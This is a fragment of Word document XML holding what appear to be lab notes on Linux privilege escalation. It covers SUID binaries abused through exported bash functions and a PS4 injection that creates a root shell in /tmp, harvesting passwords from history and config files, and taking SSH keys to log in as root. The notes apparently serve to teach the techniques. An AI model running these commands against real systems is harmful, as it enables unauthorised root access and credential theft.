      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/bin/bash - -version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AA98B7" w14:textId="50B9B9A9" w:rsidR="00B320A4" w:rsidRPr="0084205E" w:rsidRDefault="00B320A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>create bash function that executes new bash shell and export</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC1D59F" w14:textId="5FE282A0" w:rsidR="00B320A4" w:rsidRPr="0084205E" w:rsidRDefault="00B320A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>function /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/service {/bin/bash -p</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>; }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0FBA2DA9" w14:textId="553889DF" w:rsidR="00B320A4" w:rsidRPr="0084205E" w:rsidRDefault="00B320A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>export -f /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750E19E2" w14:textId="0DAF70FA" w:rsidR="00B320A4" w:rsidRPr="0084205E" w:rsidRDefault="00B320A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>run exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8DDC19" w14:textId="33CB8D92" w:rsidR="00B320A4" w:rsidRPr="0084205E" w:rsidRDefault="00B320A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/local/bin/suid-env2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2302F60E" w14:textId="2D3C4D6F" w:rsidR="00B320A4" w:rsidRPr="0084205E" w:rsidRDefault="00B320A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SUID/SGID Executable – Abusing Shell Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D737576" w14:textId="6F2C73AD" w:rsidR="00B320A4" w:rsidRPr="0084205E" w:rsidRDefault="00B320A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>will</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> not work on Bash v4.4+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175EB82D" w14:textId="2660F466" w:rsidR="00B320A4" w:rsidRPr="0084205E" w:rsidRDefault="00B320A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>run /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/local/bin/suid-env2 with bash debugging enabled and the ps4 (displays extra prompt for debugging statements) variable set to an embedded command which creates an SUID version of /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708CADF1" w14:textId="3D7716AC" w:rsidR="00B320A4" w:rsidRPr="0084205E" w:rsidRDefault="00B320A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>env -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> SHELLOPTS=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>xtrace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> PS4='$(cp /bin/bash /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rootbash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> +</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>xs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rootbash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>)' /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/local/bin/suid-env2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAD8B5E" w14:textId="4B080746" w:rsidR="00B320A4" w:rsidRPr="0084205E" w:rsidRDefault="00B320A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0BE1AC" w14:textId="0185B37A" w:rsidR="00B320A4" w:rsidRPr="0084205E" w:rsidRDefault="00B320A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rootbash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0143098B" w14:textId="1469262D" w:rsidR="00B320A4" w:rsidRPr="0084205E" w:rsidRDefault="00B320A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>to remove</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EA40BA" w14:textId="58870625" w:rsidR="00B320A4" w:rsidRPr="0084205E" w:rsidRDefault="00B320A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>rm /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rootbash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F03AF4E" w14:textId="4C29EDAB" w:rsidR="00B320A4" w:rsidRPr="0084205E" w:rsidRDefault="00B320A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8FA40A" w14:textId="06AE2B92" w:rsidR="00B320A4" w:rsidRPr="0084205E" w:rsidRDefault="00B320A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Passwords &amp; Keys – History Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CA2115" w14:textId="68005241" w:rsidR="00B320A4" w:rsidRPr="0084205E" w:rsidRDefault="00B320A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>if user types password on command line instead of password prompt, may get recorded in history file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F606FB0" w14:textId="421A688F" w:rsidR="00B320A4" w:rsidRPr="0084205E" w:rsidRDefault="00B320A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>view contents of all hidden history files in user home directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A29FA96" w14:textId="591E1F8A" w:rsidR="00B320A4" w:rsidRPr="0084205E" w:rsidRDefault="00B320A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>cat ~</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0058793C" w:rsidRPr="0084205E">
        <w:t>/.*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0058793C" w:rsidRPr="0084205E">
        <w:t>history | less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ACE7BE" w14:textId="45252B61" w:rsidR="0058793C" w:rsidRPr="0084205E" w:rsidRDefault="0058793C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>search for login attempts of various services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFE05C0" w14:textId="6A1DB6D6" w:rsidR="0058793C" w:rsidRPr="0084205E" w:rsidRDefault="0058793C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -h </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>somehost.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>uroot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -ppassword123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FC163F" w14:textId="759186CE" w:rsidR="0058793C" w:rsidRPr="0084205E" w:rsidRDefault="0058793C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Passwords &amp; Keys – Config Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AED755C" w14:textId="324E2348" w:rsidR="0058793C" w:rsidRPr="0084205E" w:rsidRDefault="0058793C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>list contents of user home directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAC5BAB" w14:textId="198D7245" w:rsidR="0058793C" w:rsidRPr="0084205E" w:rsidRDefault="0058793C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ls /home/user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62657391" w14:textId="1E223B0D" w:rsidR="0058793C" w:rsidRPr="0084205E" w:rsidRDefault="0058793C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>note config files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2240144D" w14:textId="77CEA18B" w:rsidR="0058793C" w:rsidRPr="0084205E" w:rsidRDefault="0058793C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>view with cat command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D183FB7" w14:textId="37D8E2F4" w:rsidR="0058793C" w:rsidRPr="0084205E" w:rsidRDefault="0058793C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>check for references of other locations where additional login information can be found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16877E90" w14:textId="7E0C73F3" w:rsidR="0058793C" w:rsidRPr="0084205E" w:rsidRDefault="0058793C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ex. auth-user-pass /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>openvpn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/auth.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC92006" w14:textId="5E3CAD52" w:rsidR="0058793C" w:rsidRPr="0084205E" w:rsidRDefault="0058793C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Passwords &amp; Keys – SSH Keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D1FB81" w14:textId="0C39FB49" w:rsidR="0058793C" w:rsidRPr="0084205E" w:rsidRDefault="0058793C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>look for hidden files and directories in the system root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2769D3AC" w14:textId="2D0F4BFA" w:rsidR="0058793C" w:rsidRPr="0084205E" w:rsidRDefault="0058793C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ls -la /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE27E0D" w14:textId="080D7DEB" w:rsidR="0058793C" w:rsidRPr="0084205E" w:rsidRDefault="0058793C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>view contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A45D24" w14:textId="25E197AE" w:rsidR="0058793C" w:rsidRPr="0084205E" w:rsidRDefault="0058793C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ex. ls -l /.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A84BC82" w14:textId="36C710DA" w:rsidR="0058793C" w:rsidRPr="0084205E" w:rsidRDefault="0058793C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">copy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> key to attacker computer, use key to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> into machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDE483A" w14:textId="20CA7003" w:rsidR="0058793C" w:rsidRPr="0084205E" w:rsidRDefault="0058793C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> file&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008229C5" w:rsidRPr="0084205E">
        <w:t>root@ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1137E88D" w14:textId="2165F17A" w:rsidR="008229C5" w:rsidRPr="0084205E" w:rsidRDefault="008229C5" w:rsidP="0084205E">
      <w:pPr>
